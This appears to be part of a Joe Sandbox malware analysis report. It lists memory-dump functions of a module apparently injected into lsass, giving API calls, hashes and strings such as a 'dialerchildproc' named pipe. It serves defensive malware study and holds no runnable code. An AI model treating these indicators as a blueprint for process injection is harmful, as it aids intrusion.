                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: f410c08f16195d7feb55c0acab90937f6d3a32cbd58bd7616d863ef084d28fbd
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: 634171203013C5C6FD58A73555DD76D22429B497F4F174B2BEFBA0F6D7EE28886A8201

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: 5bf1902dd2c0bb3d590e3c39ec1bf0b48186cc81f85eaad6962f89ffe1acfc31
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: A9319333A04B80C6F720DF22A88C75DA3A0F788BD5F4642279F8943B66DF38C5698740

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction ID: 5d3e7fe486244f146b54635b0d1212027529e81a6e1483a88afd0d30f5ccc161
                                                                  • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction Fuzzy Hash: F8315C22618B81C6FB50DF26A8CC75DA3A5F784F85F06422B9F9A43726DF38D8598700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: e17db8edfc6197daea080600bf38c591281c30dd8c0174fdc7d504c14fdcd248
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: 05E17A72604B40CAFB60DF69A48C39D7BA0F755B98F114217EF8957B9ACB34D598C700

                                                                   Control-flow Graph (rendered figure; the executed/not-executed block colouring is not recoverable from the page)
                                                                   • Function 202c0aea974-202c0aeae4b; no Win32 API calls appear in the graph; internal calls to 202c0aeb844, 202c0aecb78, 202c0ae9a64, 202c0ae7d70, 202c0aeae4c, 202c0ae9e40, 202c0aea154, 202c0aea114, 202c0ae9ce4, 202c0aecad8, 202c0aea128, 202c0aeb068, 202c0aea8a0, 202c0aeb8dc, 202c0ae9d74, 202c0ae9f80, 202c0aeb9cc, 202c0ae96dc, 202c0aeb424, 202c0ae98d0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: 9af3ddf56590a485978cac2ffc13644fed0e984cc27883960e106c504c4bc76f
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: C2E17C72600B80CAFB20DB6594CC39D37A4F796B88F124517EFA957B9ACB34D5A9C700

                                                                   Control-flow Graph (rendered figure; the executed/not-executed block colouring is not recoverable from the page)
                                                                   • Function 202c0aef7c4-202c0aef97e; Win32 API calls in the graph: LoadLibraryExW (two call sites, 202c0aef851 and 202c0aef8b0), GetLastError, FreeLibrary, GetProcAddress; internal calls to 202c0aecd58
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: 12418b3ded53c4190658a1cf896c70053481940a3e587dd9996ceed7dc0a2fc5
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: 0A413422311B90D1FB16CB66A88C75D2395FB08BE0F0A41278EAE87796EF39C45DC340
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: 26155b065d5d49fbc65426973210cc8d912e4c2e795746c6e68801dfcec21a53
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: 66414F73214B80C6E760CF61E48C79EB7A5F388B98F45822ADB8907759DF39C599CB40
                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: ccb3c328c1cc4f3dc6c269ba102d6e366637f7e722823d4bcdc7d35ecbba9f32
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: 5F1186607053C0C1FE58972565DD76D2141AB847F8F57473BEABE0B7D7EE28C86A4600
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: ab9853ce45aa3ae5ff0ab0df34c8b3cd04aee3897dc18913666e061f4019053a
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: 0A114932614B40C2F7108B21F48C75E6765F389BE5F618317EBAA06AA9CF7DC549CB04
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID:
                                                                  • API String ID: 190073905-0
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: 91999e882ef8325bf4855b1169034fd288f1a2cdee68592838d125f65ce938f6
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 2481F6217003C1C6FB58AB65A8CD35D6290AB85B84F174527EBE947797EB38CA6E8700
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA279
                                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: 808902013ebb169969ef197a4e5551ff5a11589a7928ddab1bd50d4f78d156e4
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: 2231B822312B80D2FE129B46A88C79D2394B759B60F5B0627DF7E1B3A2DF39D55D8310
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                  • String ID: CONOUT$
                                                                  • API String ID: 3230265001-3130406586
                                                                  • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction ID: 08d3d89060055010cc9f927f2846b741d570c307bee51878ed60177e71e4ad34
                                                                  • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction Fuzzy Hash: F4116D22310B40C6F7908B52E89C75D66A4F788FE8F164227EB5E877A6DF39C9088744
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: 76476dfaa64f7254c59cc74631256a4baa4f38b64316a815edb2c724ca880be3
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: F7117C26304780C2FB649B26E48C66D6365F788B94F26442BDF9D03765EF3EC55C8704
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction ID: d96f967ab6355dfa8b00f5612883c3689d3872b8cdd91b00a9807c55c3fa80d2
                                                                  • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction Fuzzy Hash: 88D19976209B88C6EA70DB1AE49835E77A4F388B88F110517EBDD47BA6CF38C555CB40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID: dialer
                                                                  • API String ID: 756756679-3528709123
                                                                  • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction ID: 99af3d401576157a454257e503e42e9700416411c5c03856acd84e38266f80dd
                                                                  • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction Fuzzy Hash: B1318F23705B91C2FA50DF56E58C7AD63A0BB64B84F0A41278FD847B56EF34D4798300
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED415
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED442
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED453
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED464
                                                                  • SetLastError.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: 8509bfb80ec8658d273bd47baca1274ffcff585c98ac53122ec09b9a895d6eee
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: 8E117F603053C0C2FE58A331A5DD32D2152AB58BF4F16472BEEBA0B7D7DE3898698200
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: ba41eaa8c83972b9c2955fdfe08bff1180164c354a4b3d26cc7be016e8e0f4c2
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: E3012D66611B44C2FB259B21E88CB1D63A4BB58B45F15452BCF4E06766EF3EC45C8700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
